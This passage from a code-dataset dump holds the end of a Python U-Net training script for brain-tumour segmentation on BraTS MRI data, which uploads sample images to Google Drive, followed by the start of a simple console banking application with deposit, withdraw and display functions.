# DEBUG WITH SMALL DATA\nelif DATA_SIZE == 'small':\n HGG_path_list = tl.files.load_folder_list(path=HGG_data_path)[0:40] # DEBUG WITH SMALL DATA\n LGG_path_list = tl.files.load_folder_list(path=LGG_data_path)[0:0] # DEBUG WITH SMALL DATA\nelse:\n exit(\"Unknow DATA_SIZE\")\n \nprint(\"length of HGG and LGG data list = \",len(HGG_path_list), len(LGG_path_list)) #210 #75\n\nHGG_name_list = [os.path.basename(p) for p in HGG_path_list] #extracting file names\nLGG_name_list = [os.path.basename(p) for p in LGG_path_list]\n\nsurvival_id_from_HGG = [] #used in mean and deviation calculation\nsurvival_id_from_LGG = []\nfor i in survival_id_list: \n if i in HGG_name_list:\n survival_id_from_HGG.append(i)\n elif i in LGG_name_list:\n survival_id_from_LGG.append(i)\n \nprint(len(survival_id_from_HGG), len(survival_id_from_LGG)) #163, 0\n\nindex_HGG = list(range(0, len(survival_id_from_HGG)))\n# index_HGG = []\n# index_LGG = list(range(0, 45))\nindex_LGG = list(range(0, len(survival_id_from_LGG)))\n\nif DATA_SIZE == 'all':\n dev_index_HGG = index_HGG[-84:-42]\n test_index_HGG = index_HGG[-42:]\n tr_index_HGG = index_HGG[:-84]\n dev_index_LGG = index_LGG[-30:-15]\n test_index_LGG = index_LGG[-15:]\n tr_index_LGG = index_LGG[:-30]\nelif DATA_SIZE == 'half':\n dev_index_HGG = index_HGG[-30:] # DEBUG WITH SMALL DATA\n test_index_HGG = index_HGG[-5:]\n tr_index_HGG = index_HGG[:-30]\n dev_index_LGG = index_LGG[-10:] # DEBUG WITH SMALL DATA\n test_index_LGG = index_LGG[-5:]\n tr_index_LGG = index_LGG[:-10]\nelif DATA_SIZE == 'small':\n dev_index_HGG = index_HGG[-5:] # DEBUG WITH SMALL DATA\n test_index_HGG = index_HGG[-10:-5]\n tr_index_HGG = index_HGG[:-10]\n dev_index_LGG = index_LGG[-5:] # DEBUG WITH SMALL DATA\n test_index_LGG = index_LGG[-6:-5]\n tr_index_LGG = index_LGG[:-6]\n \n \nsurvival_id_dev_HGG = [survival_id_from_HGG[i] for i in dev_index_HGG]\nsurvival_id_test_HGG = [survival_id_from_HGG[i] for i in test_index_HGG]\nsurvival_id_tr_HGG = [survival_id_from_HGG[i] for i in tr_index_HGG]\n\nsurvival_id_dev_LGG = [LGG_name_list[i] for i in dev_index_LGG]\nsurvival_id_test_LGG = [LGG_name_list[i] for i in test_index_LGG]\nsurvival_id_tr_LGG = [LGG_name_list[i] for i in 
tr_index_LGG]\n\nprint(\"survival_id_dev_LGG = \", len(survival_id_dev_LGG), \"survival_id_tr_LGG = \",len(survival_id_tr_LGG))\n\n\n#only of HGG, not of LGG\nsurvival_age_dev = [survival_age_list[survival_id_list.index(i)] for i in survival_id_dev_HGG]\nsurvival_age_test = [survival_age_list[survival_id_list.index(i)] for i in survival_id_test_HGG]\nsurvival_age_tr = [survival_age_list[survival_id_list.index(i)] for i in survival_id_tr_HGG]\n\nsurvival_period_dev = [survival_peroid_list[survival_id_list.index(i)] for i in survival_id_dev_HGG]\nsurvival_period_test = [survival_peroid_list[survival_id_list.index(i)] for i in survival_id_test_HGG]\nsurvival_period_tr = [survival_peroid_list[survival_id_list.index(i)] for i in survival_id_tr_HGG]\n\ndata_types = ['flair', 't2', 't1ce']\ndata_types_mean_std_dict = {i: {'mean': 0.0, 'std': 1.0} for i in data_types}\n\n#==================== LOAD ALL IMAGES' PATH AND COMPUTE MEAN/ STD\nfor i in data_types:\n data_temp_list = []\n for j in survival_id_from_HGG:\n img_path = os.path.join(HGG_data_path, j, j + '_' + i + '.nii.gz')\n img = nib.load(img_path).get_data()\n data_temp_list.append(img)\n\n for j in survival_id_from_LGG:\n img_path = os.path.join(LGG_data_path, j, j + '_' + i + '.nii.gz')\n img = nib.load(img_path).get_data()\n data_temp_list.append(img)\n\n data_temp_list = np.asarray(data_temp_list)\n m = np.mean(data_temp_list)\n s = np.std(data_temp_list)\n data_types_mean_std_dict[i]['mean'] = m\n data_types_mean_std_dict[i]['std'] = s\ndel data_temp_list\n\n\nprint(data_types_mean_std_dict)\n\nwith open(save_dir + 'mean_std_dict.pickle', 'wb') as f:\n pickle.dump(data_types_mean_std_dict, f, protocol=4)\n \n##==================== GET NORMALIZE IMAGES\nX_train_input = []\nX_train_target = []\n# X_train_target_whole = [] # 1 2 4\n# X_train_target_core = [] # 1 4\n# X_train_target_enhance = [] # 4\n\nX_dev_input = []\nX_dev_target = []\n# X_dev_target_whole = [] # 1 2 4\n# X_dev_target_core = [] # 1 4\n# X_dev_target_enhance = [] # 4\n\nprint(\" HGG Validation\")\nfor i in survival_id_dev_HGG:\n print(i)\n all_3d_data = []\n for j in data_types:\n img_path = os.path.join(HGG_data_path, i, i + '_' + j + '.nii.gz')\n img = nib.load(img_path).get_data()\n img = (img - data_types_mean_std_dict[j]['mean']) / data_types_mean_std_dict[j]['std']\n img = img.astype(np.float64)\n all_3d_data.append(img)\n \n seg_path = os.path.join(HGG_data_path, i, i + '_seg.nii.gz')\n seg_img = nib.load(seg_path).get_data()\n seg_img = np.transpose(seg_img, (1, 0, 2))\n for j in range(all_3d_data[0].shape[2]):\n combined_array = np.stack((all_3d_data[0][:, :, j], all_3d_data[1][:, :, j], all_3d_data[2][:, :, j]), axis=2)\n combined_array = np.transpose(combined_array, (1, 0, 2))#.tolist()\n combined_array.astype(np.float64)\n X_dev_input.append(combined_array)\n\n seg_2d = seg_img[:, :, j]\n seg_2d.astype(int) \n \n X_dev_target.append(seg_2d)\n del all_3d_data\n gc.collect()\n # print(\"finished {}\".format(i))\n\nprint(\" LGG Validation\")\nfor i in survival_id_dev_LGG:\n print(i)\n all_3d_data = []\n for j in data_types:\n img_path = os.path.join(LGG_data_path, i, i + '_' + j + '.nii.gz')\n img = nib.load(img_path).get_data()\n img = (img - data_types_mean_std_dict[j]['mean']) / data_types_mean_std_dict[j]['std']\n img = img.astype(np.float64)\n all_3d_data.append(img)\n\n seg_path = os.path.join(LGG_data_path, i, i + '_seg.nii.gz')\n seg_img = nib.load(seg_path).get_data()\n seg_img = np.transpose(seg_img, (1, 0, 2))\n for j in 
range(all_3d_data[0].shape[2]):\n combined_array = np.stack((all_3d_data[0][:, :, j], all_3d_data[1][:, :, j], all_3d_data[2][:, :, j]), axis=2)\n combined_array = np.transpose(combined_array, (1, 0, 2))#.tolist()\n combined_array.astype(np.float64)\n X_dev_input.append(combined_array)\n\n seg_2d = seg_img[:, :, j]\n seg_2d.astype(int)\n X_dev_target.append(seg_2d)\n del all_3d_data\n gc.collect()\n\nX_dev_input = np.asarray(X_dev_input, dtype=np.float64)\nX_dev_target = np.asarray(X_dev_target, dtype=np.float64)\n\n# with open(save_dir + 'dev_input.pickle', 'wb') as f:\n# pickle.dump(X_dev_input, f, protocol=4)\n# with open(save_dir + 'dev_target.pickle', 'wb') as f:\n# pickle.dump(X_dev_target, f, protocol=4)\n\n# del X_dev_input, X_dev_target\n\nprint(\" HGG Train\")\nfor i in survival_id_tr_HGG:\n print(i)\n all_3d_data = []\n for j in data_types:\n img_path = os.path.join(HGG_data_path, i, i + '_' + j + '.nii.gz')\n img = nib.load(img_path).get_data()\n img = (img - data_types_mean_std_dict[j]['mean']) / data_types_mean_std_dict[j]['std']\n img = img.astype(np.float64)\n all_3d_data.append(img)\n\n seg_path = os.path.join(HGG_data_path, i, i + '_seg.nii.gz')\n seg_img = nib.load(seg_path).get_data()\n seg_img = np.transpose(seg_img, (1, 0, 2))\n for j in range(all_3d_data[0].shape[2]):\n combined_array = np.stack((all_3d_data[0][:, :, j], all_3d_data[1][:, :, j], all_3d_data[2][:, :, j]), axis=2)\n combined_array = np.transpose(combined_array, (1, 0, 2))#.tolist()\n combined_array.astype(np.float64)\n X_train_input.append(combined_array)\n\n seg_2d = seg_img[:, :, j]\n \n seg_2d.astype(int)\n X_train_target.append(seg_2d)\n del all_3d_data\n\nprint(\" LGG Train\")\nfor i in survival_id_tr_LGG:\n print(i)\n all_3d_data = []\n for j in data_types:\n img_path = os.path.join(LGG_data_path, i, i + '_' + j + '.nii.gz')\n img = nib.load(img_path).get_data()\n img = (img - data_types_mean_std_dict[j]['mean']) / data_types_mean_std_dict[j]['std']\n img = img.astype(np.float64)\n all_3d_data.append(img)\n\n seg_path = os.path.join(LGG_data_path, i, i + '_seg.nii.gz')\n seg_img = nib.load(seg_path).get_data()\n seg_img = np.transpose(seg_img, (1, 0, 2))\n for j in range(all_3d_data[0].shape[2]):\n combined_array = np.stack((all_3d_data[0][:, :, j], all_3d_data[1][:, :, j], all_3d_data[2][:, :, j]), axis=2)\n combined_array = np.transpose(combined_array, (1, 0, 2))#.tolist()\n combined_array.astype(np.float64)\n X_train_input.append(combined_array)\n\n seg_2d = seg_img[:, :, j]\n seg_2d.astype(int)\n X_train_target.append(seg_2d)\n del all_3d_data\n \nX_train_input = np.asarray(X_train_input, dtype=np.float64)\nX_train_target = np.asarray(X_train_target, dtype=np.float64)\n\nprint(\"completed prepare_data_with_valid\")\n\ndef my_leaky_relu(x):\n return tf.nn.leaky_relu(x, alpha=0.2)\n\ndef u_net(x, is_train=False, reuse=False, n_out=1):\n _, nx, ny, nz = x.get_shape().as_list()\n print(x.get_shape().as_list())\n with tf.variable_scope(\"u_net\", reuse=reuse) as scope:\n # tl.layers.set_name_reuse(reuse)\n if reuse:\n scope.reuse_variables()\n inputs = InputLayer(x, name='inputs')\n conv1 = Conv2d(inputs, 64, (3, 3), act=tf.nn.relu, padding='SAME', name='conv1_1')\n conv1 = Conv2d(conv1, 64, (3, 3), act=tf.nn.relu, padding='SAME', name='conv1_2')\n pool1 = MaxPool2d(conv1, (2, 2), name='pool1')\n conv2 = Conv2d(pool1, 128, (3, 3), act=tf.nn.relu, padding='SAME', name='conv2_1')\n conv2 = Conv2d(conv2, 128, (3, 3), act=tf.nn.relu, padding='SAME', name='conv2_2')\n pool2 = MaxPool2d(conv2, (2, 2), 
name='pool2')\n conv3 = Conv2d(pool2, 256, (3, 3), act=tf.nn.relu, padding='SAME', name='conv3_1')\n conv3 = Conv2d(conv3, 256, (3, 3), act=tf.nn.relu, padding='SAME', name='conv3_2')\n pool3 = MaxPool2d(conv3, (2, 2), name='pool3')\n conv4 = Conv2d(pool3, 512, (3, 3), act=tf.nn.relu, padding='SAME', name='conv4_1')\n conv4 = Conv2d(conv4, 512, (3, 3), act=tf.nn.relu, padding='SAME', name='conv4_2')\n pool4 = MaxPool2d(conv4, (2, 2), name='pool4')\n conv5 = Conv2d(pool4, 1024, (3, 3), act=tf.nn.relu, padding='SAME', name='conv5_1')\n conv5 = Conv2d(conv5, 1024, (3, 3), act=tf.nn.relu, padding='SAME', name='conv5_2')\n\n up4 = DeConv2d(conv5, 512, (3, 3), (2, 2), name='deconv4')\n up4 = ConcatLayer([up4, conv4], 3, name='concat4')\n conv4 = Conv2d(up4, 512, (3, 3), act=tf.nn.relu, padding='SAME', name='uconv4_1')\n conv4 = Conv2d(conv4, 512, (3, 3), act=tf.nn.relu, padding='SAME', name='uconv4_2')\n up3 = DeConv2d(conv4, 256, (3, 3), (2, 2), name='deconv3')\n up3 = ConcatLayer([up3, conv3], 3, name='concat3')\n conv3 = Conv2d(up3, 256, (3, 3), act=tf.nn.relu, padding='SAME', name='uconv3_1')\n conv3 = Conv2d(conv3, 256, (3, 3), act=tf.nn.relu, padding='SAME', name='uconv3_2')\n up2 = DeConv2d(conv3, 128, (3, 3), (2, 2), name='deconv2')\n up2 = ConcatLayer([up2, conv2], 3, name='concat2')\n conv2 = Conv2d(up2, 128, (3, 3), act=tf.nn.relu, padding='SAME', name='uconv2_1')\n conv2 = Conv2d(conv2, 128, (3, 3), act=tf.nn.relu, padding='SAME', name='uconv2_2')\n up1 = DeConv2d(conv2, 64, (3, 3), (2, 2), name='deconv1')\n up1 = ConcatLayer([up1, conv1] , 3, name='concat1')\n conv1 = Conv2d(up1, 64, (3, 3), act=tf.nn.relu, padding='SAME', name='uconv1_1')\n conv1 = Conv2d(conv1, 64, (3, 3), act=tf.nn.relu, padding='SAME', name='uconv1_2')\n conv1 = Conv2d(conv1, n_out, (1, 1), act=tf.nn.sigmoid, padding='SAME', name='uconv1')\n return conv1\n \ndef distort_imgs(data):\n \"\"\" data augumentation \"\"\"\n x1, x3, x4, y = data\n # x1, x2, x3, x4, y = tl.prepro.flip_axis_multi([x1, x2, x3, x4, y], # previous without this, hard-dice=83.7\n # axis=0, is_random=True) # up down\n x1, x3, x4, y = tl.prepro.flip_axis_multi([x1, x3, x4, y],\n axis=1, is_random=True) # left right\n# x1, x3, x4, y = tl.prepro.elastic_transform_multi([x1, x3, x4, y],\n# alpha=720, sigma=24, is_random=True)\n x1, x3, x4, y = tl.prepro.rotation_multi([x1, x3, x4, y], rg=20,\n is_random=True, fill_mode='constant') # nearest, constant\n x1, x3, x4, y = tl.prepro.shift_multi([x1, x3, x4, y], wrg=0.10,\n hrg=0.10, is_random=True, fill_mode='constant') #can try different values for shifting\n# x1, x3, x4, y = tl.prepro.shear_multi([x1, x3, x4, y], 0.05,\n# is_random=True, fill_mode='constant')\n# x1, x3, x4, y = tl.prepro.zoom_multi([x1, x3, x4, y],\n# zoom_range=[0.9, 1.1], is_random=True,\n# fill_mode='constant')\n return x1, x3, x4, y\n\ndef vis_imgs(X, y, path):\n \"\"\" show one slice \"\"\"\n if y.ndim == 2: #.ndim gives the number of dimensions\n y = y[:,:,np.newaxis]\n assert X.ndim == 3\n tl.vis.save_images(np.asarray([X[:,:,0],\n X[:,:,1], X[:,:,2], y[:,:,0]]), size=(1, 4),\n image_path=path) # this gives the warning of conversion of float to uint\n\ndef vis_imgs2(X, y_, y, path):\n \"\"\" show one slice with target \"\"\"\n if y.ndim == 2:\n y = y[:,:,np.newaxis]\n if y_.ndim == 2:\n y_ = y_[:,:,np.newaxis]\n assert X.ndim == 3\n tl.vis.save_images(np.asarray([X[:,:,0,np.newaxis],\n X[:,:,1,np.newaxis], X[:,:,2,np.newaxis], y_, y]), size=(1, 5),\n image_path=path)\n\ndef main(task='all'):\n ## Create folder to save trained 
model and result images\n save_dir = \"/content/checkpoint\"\n tl.files.exists_or_mkdir(save_dir)\n tl.files.exists_or_mkdir(\"samples/{}\".format(task))\n\n ###======================== LOAD DATA ===================================###\n ## by importing this, you can load a training set and a validation set.\n # you will get X_train_input, X_train_target, X_dev_input and X_dev_target\n # there are 4 labels in targets:\n # Label 0: background\n # Label 1: necrotic and non-enhancing tumor\n # Label 2: edema\n # Label 4: enhancing tumor\n \n# import prepare_data_with_valid as dataset\n# X_train = dataset.X_train_input\n# y_train = dataset.X_train_target[:,:,:,np.newaxis]\n# X_test = dataset.X_dev_input\n# y_test = dataset.X_dev_target[:,:,:,np.newaxis]\n print(X_train_input.shape)\n X_train = X_train_input\n y_train = X_train_target[:,:,:,np.newaxis]\n X_test = X_dev_input\n y_test = X_dev_target[:,:,:,np.newaxis]\n \n print(\"X_train.shape = \", X_train.shape)\n print(\"X_train_target.shape = \",X_train_target.shape)\n print(\"y_train.shape = \",y_train.shape)\n if task == 'all':\n y_train = (y_train > 0).astype(int)\n y_test = (y_test > 0).astype(int)\n elif task == 'necrotic':\n y_train = (y_train == 1).astype(int)\n y_test = (y_test == 1).astype(int)\n elif task == 'edema':\n y_train = (y_train == 2).astype(int)\n y_test = (y_test == 2).astype(int)\n elif task == 'enhance':\n y_train = (y_train == 4).astype(int)\n y_test = (y_test == 4).astype(int)\n elif task == 'core':\n y_train = np.logical_or(y_train==4,y_train==1).astype(int)\n y_test = np.logical_or(y_test==4,y_test==1).astype(int)\n else:\n exit(\"Unknow task %s\" % task)\n\n ###======================== HYPER-PARAMETERS ============================###\n batch_size = 20\n lr = 0.0001 \n # lr_decay = 0.5\n # decay_every = 100\n beta1 = 0.9\n n_epoch = 30\n print_freq_step = 100\n\n ###======================== SHOW DATA ===================================###\n # show one slice\n X = np.asarray(X_train[10])\n y = np.asarray(y_train[10])\n print(X.shape, X.min(), X.max()) # (240, 240, 4) -0.380588 2.62761\n print(y.shape, y.min(), y.max()) # (240, 240, 1) 0 1\n nw, nh, nz = X.shape\n vis_imgs(X, y, 'samples/{}/_train_im.png'.format(task))\n # show data augumentation results\n for i in range(10):\n x_flair, x_t2, x_t1ce, label = distort_imgs([X[:,:,0,np.newaxis], X[:,:,1,np.newaxis], X[:,:,2,np.newaxis], y])#[:,:,np.newaxis]])\n X_dis = np.concatenate((x_flair, x_t2, x_t1ce), axis=2)\n vis_imgs(X_dis, label, 'samples/{}/_train_im_aug{}.png'.format(task, i)) \n \n# try:\n# files.download(\"_train_im_aug{}.png\".format(0))\n# files.download('/content/samples/all/_train_im_aug{}.png'.format(0))\n# uploaded = drive.CreateFile({'title': '_train_im_aug{}_{}_{}_{}.png'.format(0,task,0,0)})\n# uploaded.SetContentFile('/content/samples/{}/_train_im_aug{}.png'.format(task,0))\n# uploaded.Upload()\n# print('Uploaded file with ID {}'.format(uploaded.get('id')))\n# file_metadata = {\n# 'name': '_train_{}_im_dummy_aug{}.png'.format(task,0),\n# 'mimeType': 'image/png',\n# 'parents': ['19aRVWFG6ZZneRQ869u6vYlhAVtjvep7f']\n# }\n# media = MediaFileUpload('/content/samples/{}/_train_im_aug{}.png'.format(task,0), \n# mimetype='image/png',\n# resumable=True)\n# created = drive_service.files().create(body=file_metadata,\n# media_body=media,\n# fields='id').execute()\n# print('File ID: {} and train_{}_{}_{}.png '.format(created.get('id'),task,0,0))\n# except Exception as e:\n# print(\"file not found\" + str(e))\n \n \n with tf.device('/GPU:0'):\n 
tf.reset_default_graph()\n sess = tf.Session(config=tf.ConfigProto(allow_soft_placement=True, log_device_placement=True))\n with tf.device('/GPU:0'): #<- remove it if you train on CPU or other GPU\n ###======================== DEFIINE MODEL =======================###\n ## nz is 4 as we input all Flair, T1, T1c and T2.\n t_image = tf.placeholder('float32', [batch_size, nw, nh, nz], name='input_image')\n ## labels are either 0 or 1\n t_seg = tf.placeholder('float32', [batch_size, nw, nh, 1], name='target_segment')\n ## train inference\n #net = model.u_net(t_image, is_train=True, reuse=False, n_out=1)\n net = u_net(t_image, is_train=True, reuse=False, n_out=1)\n ## test inference\n #net_test = model.u_net(t_image, is_train=False, reuse=True, n_out=1)\n net_test = u_net(t_image, is_train=False, reuse=True, n_out=1)\n\n ###======================== DEFINE LOSS =========================###\n ## train losses\n out_seg = net.outputs\n dice_loss = 1 - tl.cost.dice_coe(out_seg, t_seg, axis=[0,1,2,3])#, 'jaccard', epsilon=1e-5)\n iou_loss = tl.cost.iou_coe(out_seg, t_seg, axis=[0,1,2,3])\n dice_hard = tl.cost.dice_hard_coe(out_seg, t_seg, axis=[0,1,2,3])\n loss = dice_loss\n\n ## test losses\n test_out_seg = net_test.outputs\n test_dice_loss = 1 - tl.cost.dice_coe(test_out_seg, t_seg, axis=[0,1,2,3])#, 'jaccard', epsilon=1e-5)\n test_iou_loss = tl.cost.iou_coe(test_out_seg, t_seg, axis=[0,1,2,3])\n test_dice_hard = tl.cost.dice_hard_coe(test_out_seg, t_seg, axis=[0,1,2,3])\n\n ###======================== DEFINE TRAIN OPTS =======================###\n t_vars = tl.layers.get_variables_with_name('u_net', True, True)\n with tf.device('/GPU:0'):\n with tf.variable_scope('learning_rate'):\n lr_v = tf.Variable(lr, trainable=True) #changed here\n train_op = tf.train.AdamOptimizer(lr_v, beta1=beta1).minimize(loss, var_list=t_vars)\n\n ###======================== LOAD MODEL ==============================###\n sess.run(tf.global_variables_initializer()) \n #tl.layers.initialize_global_variables(sess)\n ## load existing model if possible\n tl.files.load_and_assign_npz(sess=sess, name=save_dir+'/u_net_{}.npz'.format(task), network=net)\n \n total_parameters = 0\n for variable in tf.trainable_variables():\n # shape is an array of tf.Dimension\n shape = variable.get_shape()\n print(shape)\n print(len(shape))\n variable_parameters = 1\n for dim in shape:\n print(dim)\n variable_parameters *= dim.value\n print(\"variable_parameters =\", variable_parameters)\n total_parameters += variable_parameters\n print(\"total_parameters = \",total_parameters)\n ###======================== TRAINING ================================###\n for epoch in range(0, n_epoch+1):\n epoch_time = time.time()\n print(\"epoch = {} and epoch_time = {}\".format(epoch, epoch_time))\n \n step_count=0\n total_dice, total_iou, total_dice_hard, n_batch = 0, 0, 0, 0\n for batch in tl.iterate.minibatches(inputs=X_train, targets=y_train,\n batch_size=batch_size, shuffle=True):\n images, labels = batch\n step_time = time.time()\n print(\"step_time = {}\".format(step_time))\n ## data augumentation for a batch of Flair, T1, T1c, T2 images\n # and label maps synchronously.\n data = tl.prepro.threading_data([_ for _ in zip(images[:,:,:,0, np.newaxis],\n images[:,:,:,1, np.newaxis], images[:,:,:,2, np.newaxis], labels)],\n fn=distort_imgs) # (10, 5, 240, 240, 1)\n step_count+=1\n print(\"step_count = \", step_count)\n b_images = data[:,0:3,:,:,:] # (10, 4, 240, 240, 1)\n b_labels = data[:,3,:,:,:]\n b_images = b_images.transpose((0,2,3,1,4))\n b_images.shape = 
(batch_size, nw, nh, nz)\n\n ## update network\n _, _dice, _iou, _diceh, out = sess.run([train_op,\n dice_loss, iou_loss, dice_hard, net.outputs],\n {t_image: b_images, t_seg: b_labels})\n total_dice += _dice; total_iou += _iou; total_dice_hard += _diceh\n n_batch += 1\n\n if n_batch % print_freq_step == 0:\n print(\"Epoch %d step %d 1-dice: %f hard-dice: %f iou: %f took %fs (2d with distortion)\"\n % (epoch, n_batch, _dice, _diceh, _iou, time.time()-step_time))\n\n\n print(\" ** Epoch [%d/%d] train 1-dice: %f hard-dice: %f iou: %f took %fs (2d with distortion)\" %\n (epoch, n_epoch, total_dice/n_batch, total_dice_hard/n_batch, total_iou/n_batch, time.time()-epoch_time))\n\n ## save a predition of training set\n for i in range(batch_size):\n if np.max(b_images[i]) > 0:\n vis_imgs2(b_images[i], b_labels[i], out[i], \"samples/{}/train_{}_{}.png\".format(task, epoch, i))\n file_metadata = {\n 'name': 'train_{}_{}_{}.png'.format(task,epoch,i),\n 'mimeType': 'image/png',\n 'parents': ['1fdtIU2oq_TMja28vjlrzxiYsjVUWvBjK']\n }\n media = MediaFileUpload('/content/samples/{}/train_{}_{}.png'.format(task,epoch,i), \n mimetype='image/png',\n resumable=True)\n created = drive_service.files().create(body=file_metadata,\n media_body=media,\n fields='id').execute()\n print('File ID: {} and train_{}_{}_{}.png '.format(created.get('id'),task,epoch,i))\n elif i == batch_size-1:\n vis_imgs2(b_images[i], b_labels[i], out[i], \"samples/{}/train_{}_{}.png\".format(task, epoch, i))\n file_metadata = {\n 'name': 'train_{}_{}_{}.png'.format(task,epoch,i),\n 'mimeType': 'image/png',\n 'parents': ['1fdtIU2oq_TMja28vjlrzxiYsjVUWvBjK']\n }\n media = MediaFileUpload('/content/samples/{}/train_{}_{}.png'.format(task,epoch,i), \n mimetype='image/png',\n resumable=True)\n created = drive_service.files().create(body=file_metadata,\n media_body=media,\n fields='id').execute()\n print('File ID: {} and train_{}_{}_{}.png '.format(created.get('id'),task,epoch,i))\n\n ###======================== EVALUATION ==========================###\n total_dice, total_iou, total_dice_hard, n_batch = 0, 0, 0, 0\n for batch in tl.iterate.minibatches(inputs=X_test, targets=y_test,\n batch_size=batch_size, shuffle=True): #shuffle=True\n b_images, b_labels = batch\n _dice, _iou, _diceh, out = sess.run([test_dice_loss,\n test_iou_loss, test_dice_hard, net_test.outputs],\n {t_image: b_images, t_seg: b_labels})\n total_dice += _dice; total_iou += _iou; total_dice_hard += _diceh\n n_batch += 1\n\n print(\" **\"+\" \"*17+\"test 1-dice: %f hard-dice: %f iou: %f (2d no distortion)\" %\n (total_dice/n_batch, total_dice_hard/n_batch, total_iou/n_batch))\n print(\" task: {}\".format(task))\n ## save a predition of test set\n for i in range(batch_size):\n if np.max(b_images[i]) > 0:\n vis_imgs2(b_images[i], b_labels[i], out[i], \"samples/{}/test_{}_{}.png\".format(task, epoch, i))\n file_metadata = {\n 'name': 'test_{}_{}_{}.png'.format(task,epoch,i),\n 'mimeType': 'image/png',\n 'parents': ['1fdtIU2oq_TMja28vjlrzxiYsjVUWvBjK']\n }\n media = MediaFileUpload('/content/samples/{}/test_{}_{}.png'.format(task,epoch,i), \n mimetype='image/png',\n resumable=True)\n created = drive_service.files().create(body=file_metadata,\n media_body=media,\n fields='id').execute()\n print('File ID: {} and test_{}_{}_{}.png '.format(created.get('id'),task,epoch,i))\n elif i == batch_size-1:\n vis_imgs2(b_images[i], b_labels[i], out[i], \"samples/{}/test_{}_{}.png\".format(task, epoch, i))\n file_metadata = {\n 'name': 'test_{}_{}_{}.png'.format(task,epoch,i),\n 'mimeType': 
'image/png',\n 'parents': ['1fdtIU2oq_TMja28vjlrzxiYsjVUWvBjK']\n }\n media = MediaFileUpload('/content/samples/{}/test_{}_{}.png'.format(task,epoch,i), \n mimetype='image/png',\n resumable=True)\n created = drive_service.files().create(body=file_metadata,\n media_body=media,\n fields='id').execute()\n print('File ID: {} and test_{}_{}_{}.png '.format(created.get('id'),task,epoch,i))\n\n ###======================== SAVE MODEL ==========================###\n tl.files.save_npz(net.all_params, name=save_dir+'/u_net_{}_{}.npz'.format(task, epoch), sess=sess)\n \n\nif __name__ == \"__main__\":\n\n main('core')\n \n\n\n\n","sub_path":"HGG.py","file_name":"HGG.py","file_ext":"py","file_size_in_byte":29517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"432632585","text":"'''\n\nSimple CUI based Banking Application with the Basic Banking Operations\nWhich are listed Below:\n- Creating a Account\n- Deposit\n- Withdraw\n- Message after each transaction on the screen\n\n'''\n\n# The Function to call the Team Members if quiting\n\ndef Quit():\n\tteamMembers()\n\tprint(\"*\"*12+\" Thank You \"+\"*\"*12)\n\treturn\n\n# Banner Function to make the program more attractive\n\ndef banner():\n\tprint(\"*\"*36)\n\tprint(\"\\tBanking Application\")\n\tprint(\"*\"*36)\n\n# Team Members and the print operation of their names\n\ndef teamMembers():\n\tmembers = ['Abhi Saxena','Shivani Singh','Baby Yadav','Siddharth Mani Tiwari','Sunil Kumar Singh','Navneet Jaiswal','Shailesh']\n\tbranch = \"CSE\"\n\tyear = 3\n\tprint(\"-\" * 12 + \"Team Members\" + \"-\" * 12)\n\tfor index in range(0,7):\n\t\tprint(\"\\tName: \", members[index])\n\t\tprint(\"\\tBranch: \" + branch)\n\t\tprint(\"\\tYear: \"+str(year)+\"rd Year\")\n\t\tprint(\"-\"*36)\n\treturn\n\n# The Main Function to call each operation as per the need\n\ndef bank():\n\tAccount = createAcc()\n\torder = ['Account Number','Name','Account Type','Balance']\n\twhile True:\n\t\tchoices = {1:'Deposit',2:'Withdraw',3:'Display',4:'Quit'}\n\t\tprint(\"\\nOptions\\n\")\n\t\tfor num in range(1,len(choices)+1):\n\t\t\tprint(num,\")\",choices[num])\n\t\tchoice = int(input(\"\\nEnter Your Choice: \"))\n\t\tif choice == 1:\n\t\t\tAccount = Deposit(Account)\n\t\telif choice == 2:\n\t\t\tAccount =Withdraw(Account)\n\t\telif choice == 3:\n\t\t\tDisplay(Account,order)\n\t\telif choice == 4:\n\t\t\tQuit()\n\t\t\tbreak\n\t\telse:\n\t\t\tprint(\"\\n\\nInvalid Input! 
Try again...\")\n\treturn\n\t\t\n# A function for verification of account number\n\ndef verify(accInfo):\n\tuserInput = int(input(\"Enter Your Account Number: \"))\n\tif userInput == accInfo[0]:\n\t\treturn True\n\telse:\n\t\treturn False\n\t\n# The Deposit function to let the user deposit the amount of money he wants\n\ndef Deposit(accInfo):\n\tif verify(accInfo):\n\t\tamount=int(input(\"Enter the Amount you want to Deposit (In Rs.): \"))\n\t\taccInfo[3]+=amount\n\t\tprint(\"\\nUpdated Balance: Rs.\",accInfo[3])\n\telse:\n\t\tprint(\"Account Verification Failed!\")\n\treturn accInfo\n\n# The withdraw function to let the user withdraw an amount from the money he owns\n# Operations for both savings and current accounts\n\ndef Withdraw(accInfo):\n\tif verify(accInfo):\n\t\tamount = int(input(\"Enter the Amount you want to Withdraw: \"))\n\t\tif accInfo[2] == \"Savings\":\n\t\t\tif accInfo[3] < amount:\n\t\t\t\tprint(\"\\nInsufficient Balance!\")\n\t\t\t\tprint(\"\\nCurrent Balance: Rs.\",accInfo[3])\n\t\t\telif accInfo[3] >= amount:\n\t\t\t\taccInfo[3]-=amount\n\t\t\t\tprint(\"\\nUpdated Balance: Rs.\",accInfo[3])\n\t\telif accInfo[2] == \"Current\":\n\t\t\taccInfo[3]-=amount\n\t\t\tprint(\"\\nUpdated Balance: Rs.\",accInfo[3])\n\telse:\n\t\tprint(\"Account Verification Failed!\")\n\treturn accInfo\n\n# The Display function to print all the account details with their corresponding label\n\ndef Display(accInfo,order):\n\tif verify(accInfo):\n\t\tprint(\"\\nAccount Information:\")\n\t\tfor index in range(0,len(order)):\n\t\t\tprint(order[index]+\": \"+str(accInfo[index]))\n\telse:\n\t\tprint(\"Account Verification Failed!\")\n\n# The function to create a new account at the start of the program\n\ndef createAcc():\n\tprint(\"\\nAccount Creation Procedure\")\n\tname = input(\"\\nENTER YOUR FULL NAME: \")\n\taccType = 0\n\twhile not (accType > 0 and accType < 3):\n\t\taccType = int(input(\"\\nSelect Account Type:\\n1. Savings\\t2. Current\\n> \"))\n\tif accType == 1:\n\t\taccType = str(\"Savings\")\n\telif accType == 2:\n\t\taccType = str(\"Current\")\n\taccNum = int(input(\"\\nENTER YOUR ACCOUNT NUMBER: \"))\n\tbal = int(input(\"\\nENTER THE BALANCE AMOUNT (in Rs.): \"))\n\taccInfo = []\n\taccInfo.append(accNum)\n\taccInfo.append(name)\n\taccInfo.append(accType)\n\taccInfo.append(bal)\n\treturn accInfo\n\n# The starting calls of the functions are 